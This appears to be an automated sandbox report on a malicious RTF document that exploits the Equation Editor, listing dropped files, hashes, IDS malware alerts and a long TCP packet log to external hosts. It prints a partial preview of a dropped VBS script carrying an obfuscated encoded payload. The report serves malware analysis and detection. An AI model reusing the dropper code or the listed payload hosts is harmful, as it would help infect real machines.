                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyyAGlY5mWSyePAi/lln:vdsCkWtA9/idl
                                              MD5:782B772E21E6B8EFB11B235130F050A6
                                              SHA1:D841FB557392C38D7B7F5EF52F03D6FA77DAD0EC
                                              SHA-256:F69766E15E5E7AFF3E540B8B098B618172F5350CBDFA757D4CFD9071A5DA37E8
                                              SHA-512:DAB38260CE9D0C9C11478D982B6672058BF07CCD28DB4CB36F8112252BEE9D34EA55F07364BCF2883A8CB211AA7701D877B7827CF0EB7BC8E19DA7249C456849
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs

                                              Download File
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:ASCII text, with very long lines (65399), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):92431
                                              Entropy (8bit):4.8789339351328405
                                              Encrypted:false
                                              SSDEEP:1536:35VT1rG9XgL21xU47L2HiUYxd9jd4Qyxsyf4SgfAw2zXdcp2bF+Z:JPG9pxh7L2SxKsu4SU0u2bI
                                              MD5:7834CBAFCFAD72B1BDA091F3CCE8E997
                                              SHA1:034AFCB22B254090084269FC8BCD68F64E4A85A8
                                              SHA-256:AAC62555CF55C081E503636CF2D696AB33A789B9D10DDC8A9EF2ED8014890913
                                              SHA-512:FA08EF7847F8F98A6E2442DB45935FBAA30D0C0CD26ABF457F8579FFDACE28D7851D5BBDC7630406C5FCFE74381241ACCD74B72E4DD79E194E1FD481BC06CFFF
                                              Malicious:true
                                              Preview:' Main script logic for processing Base64-encoded data....' Initialize the Base64 encoded string (placeholder)..Dim encodedBase64String..encodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@))@@ED@@Fvx9GY@@@@@@@@@@@@@@@@@@@@O@@@@DgEL@@))@@@@@@I@@@@@@@@C8@@@@@@@@@@@@@@@@Ep4@@@@@@@@g@@@@@@@@o@@@@@@@@@@...@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@...@@@@@@...@@@@@@@@@@@@E@@@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Lid@@@@...X@@@@@@@@@@M@@@@@@@@Q7@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@K@@@@@@@@w@@@@@@CwSQ@@@@H@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@I@@@@@@C@@@@@@@@@@@@@@@@@@@@@@@

                                              C:\Users\user\Desktop\~$J2QgQF4u.rtf

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyyAGlY5mWSyePAi/lln:vdsCkWtA9/idl
                                              MD5:782B772E21E6B8EFB11B235130F050A6
                                              SHA1:D841FB557392C38D7B7F5EF52F03D6FA77DAD0EC
                                              SHA-256:F69766E15E5E7AFF3E540B8B098B618172F5350CBDFA757D4CFD9071A5DA37E8
                                              SHA-512:DAB38260CE9D0C9C11478D982B6672058BF07CCD28DB4CB36F8112252BEE9D34EA55F07364BCF2883A8CB211AA7701D877B7827CF0EB7BC8E19DA7249C456849
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              Static File Info

                                              General

                                              File type:Rich Text Format data, version 1
                                              Entropy (8bit):2.8471901685936154
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:eMJ2QgQF4u.rtf
                                              File size:108'966 bytes
                                              MD5:d805f910e1756735e34523281088f2ed
                                              SHA1:243f7b70a0fde02f3afd3b7d2fe99a786cb505db
                                              SHA256:d43cc5a3d193c33295a70f6861ee2d0ddbeeb165ab106018f06a38cc5297eb57
                                              SHA512:37c6edc231148af4c65c77412f7672d12ec8504b3fb35bf6581e7a3405242a21d302af97c6b898312750d8938d8c4b83299dc746a284f5f90e2b8e5b7cba807f
                                              SSDEEP:768:DdO5Q5s3pz7p3S2b9dbk4bSI+GdepBlMNIbnq8dEK7wC5Sbcif4:DwaGj9BjjdepBCNIbnfEGMbn4
                                              TLSH:82B3CDA9C78F01A5CF64A73B03679A0945F8B33EF21458A530AC977133EDD2E596187C
                                              File Content Preview:{\rtf1..{\*\9tK3ug6SfiJBlo39Vt3WS6ar2vcROpN1MywcyDGhqQLa9xg1cP1BtfFg5Bc5eSCSPmbIvLuh2OtfipPq9uEL2LruDTpJQo4ySrisQ4yiN7MD7R9sFx}..{\44620688%=-)~61./$?$9;)?2.=&_-&~?@,+,^)'.~4&|?#6??~1;!=.+`@'1>!?7)?[5.?%|%.,28_^.*.4._?_1+0&%1%).$.~[[>&`??80'.*!.(-.|?~.?>`

                                              File Icon

                                              Icon Hash:2764a3aaaeb7bdbf

                                              Static RTF Info

                                              Objects

                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                              000001FBEhno

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-27T10:57:07.632401+02002019696ET MALWARE Possible MalDoc Payload Download Nov 11 20141192.168.2.2249166185.18.213.20443TCP
                                              2024-09-27T10:57:07.632401+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.2249166185.18.213.20443TCP
                                              2024-09-27T10:57:09.645046+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249167185.18.213.20443TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 27, 2024 10:57:02.180000067 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.184861898 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.184930086 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.185199976 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.189933062 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.803174019 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.803193092 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.803203106 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.803212881 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.803224087 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.803234100 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.803244114 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.803250074 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.803253889 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.803271055 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.803282976 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.803289890 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.803289890 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.803309917 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.803323984 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.808748960 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.809614897 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.809674978 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.809778929 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.809818983 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.890192032 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.890212059 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.890224934 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.890235901 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.890288115 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.890289068 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.890335083 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.890347004 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.890360117 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.890396118 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.890398026 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.890398026 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.890408993 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.890436888 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.891119003 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.891138077 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.891149044 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.891180038 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.891202927 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.891202927 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.891216040 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.891261101 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.892038107 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.892050028 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.892061949 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.892097950 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.892103910 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.892117977 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.892118931 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.892160892 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.892906904 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.892920017 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.892930984 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.892967939 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.893019915 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.974231958 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.974267960 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.974278927 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.974288940 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.974292040 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.974330902 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.974340916 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.977443933 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.977463007 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.977472067 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.977488995 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.977499008 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.977507114 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.977520943 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.977525949 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.977531910 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.977782011 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.977978945 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.977991104 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.978001118 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.978018999 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.978030920 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.978055954 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.978068113 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.978089094 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.978099108 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.978607893 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.978619099 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.978631020 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.978650093 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.978669882 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.978672981 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.978683949 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.978694916 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.978702068 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.978705883 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.978719950 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.978734016 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.979541063 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.979551077 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.979561090 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.979583979 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.979598045 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.979613066 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.979624033 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.979633093 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.979641914 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.979645014 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.979660034 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.979675055 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.980432987 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.980444908 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.980454922 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.980477095 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.980488062 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.980515957 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.980525970 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.980535984 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.980546951 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.980551004 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.980562925 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.980577946 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:02.981384993 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:02.981429100 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:03.060085058 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:03.060112953 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:03.060126066 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:03.060137033 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:03.060148954 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:03.060161114 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:03.060163021 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:03.060205936 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:03.060205936 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:03.060216904 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:03.060229063 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:03.060240030 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:03.060251951 CEST8049165185.235.137.223192.168.2.22
                                              Sep 27, 2024 10:57:03.060261011 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:03.060275078 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:03.060290098 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:03.584847927 CEST4916580192.168.2.22185.235.137.223
                                              Sep 27, 2024 10:57:05.859360933 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:05.859419107 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:05.859504938 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:05.865971088 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:05.865994930 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:06.673691988 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:06.673825979 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:06.706881046 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:06.706907988 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:06.707344055 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:06.911413908 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:06.911509991 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.314166069 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.359417915 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.632471085 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.749442101 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.749494076 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.749593973 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.749634981 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.749646902 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.749682903 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.751624107 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.751631021 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.751672029 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.751677036 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.751683950 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.751699924 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.751724005 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.789282084 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.919734955 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.919748068 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.919807911 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.919815063 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.919879913 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.919907093 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.919935942 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.920615911 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.920625925 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.920661926 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.920674086 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.920694113 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.920702934 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.920706987 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.920773029 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.921375036 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.921421051 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.921452045 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.921458960 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.921483040 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.924225092 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.924268961 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.924277067 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.924287081 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:07.924316883 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:07.949064016 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.090574980 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.090626955 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.090729952 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.090758085 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.090790033 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.090908051 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.090945005 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.090954065 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.090964079 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.090993881 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.091861010 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.091903925 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.091907024 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.091926098 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.091939926 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.095237017 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.095285892 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.095290899 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.095314026 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.095329046 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.095603943 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.095648050 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.101526022 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.101548910 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.101562977 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.101644039 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.102834940 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.178327084 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.178385973 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.178442001 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.178442001 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.178468943 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.200781107 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.260687113 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.260756969 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.260834932 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.260867119 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.260895014 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.261339903 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261388063 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.261394024 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261406898 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261441946 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.261719942 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261765957 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.261766911 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261775970 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.261810064 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.262058020 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262104034 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.262104988 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262113094 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262147903 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.262254953 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262299061 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.262303114 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262331009 CEST44349166185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.262366056 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.264333010 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.354645967 CEST49166443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.358833075 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.358886003 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:08.358946085 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.360899925 CEST49167443192.168.2.22185.18.213.20
                                              Sep 27, 2024 10:57:08.360924959 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.167964935 CEST44349167185.18.213.20192.168.2.22
                                              Sep 27, 2024 10:57:09.177370071 CEST49167443192.168.2.22185.18.213.20
